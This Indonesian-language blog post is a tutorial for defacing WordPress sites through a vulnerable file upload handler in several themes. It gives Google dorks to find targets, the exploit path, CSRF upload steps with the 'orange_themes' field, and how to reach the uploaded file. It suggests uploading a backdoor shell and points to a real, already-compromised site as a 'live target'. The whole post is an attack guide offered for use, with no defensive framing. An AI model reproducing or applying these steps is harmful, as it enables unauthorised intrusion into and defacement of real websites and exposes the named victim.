cara deface Wordpress metode orange theme
assalamualaikum wr wb
kali ini saya akan share tutorial cara deface web wordpress
metode orange theme
vulnreability:upload with csrf
oke langsung saja berikut caranya
siapkan:
-shell backdoor: klik ini Shell Backdoor
-browser yang suppport
-Csrf online:Csrf
tapi saya akan mengajarkan upload ekstensi html saja oke:)
dork :
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
kembangin agar dapet yg fresh
exploit
/wp-content/themes/rockstar-theme/functions/upload-handler.php
atau
wp-content/themes/kernel-theme/functions/upload-handler.php
Langkah Langkah
1.pertama dork di google lalu pilih web yang vuln
2.sekarang tambahkan exploit di belakangnya
exploit
wp-content/themes/kernel-theme/functions/upload-handler.php
jika error artinya vuln 
-nah sekarang kita masuk ke csrf(cross site request forgency)
csrf
lalu postfilenya orange_themes
3.sekarang sudah ter upload
kita panggil script yang kita upload tadi
4.cara manggilnya
tambahkan exploit wp-content/uploads/[tahun]/[bulan]/scriptmu:v
untuk lebih lengkap silahkan lihat vidionya
https://youtu.be/NZhdibmlajk
Live Target
http://youngpetro.org/wp-content/uploads/2019/05/heker.html
Catatan:kalian juga bisa saja up shell di web itu jika webnya suppprt
website www.silentghost.zzux.com
Belum ada Komentar untuk "cara deface Wordpress metode orange theme"
Posting Komentar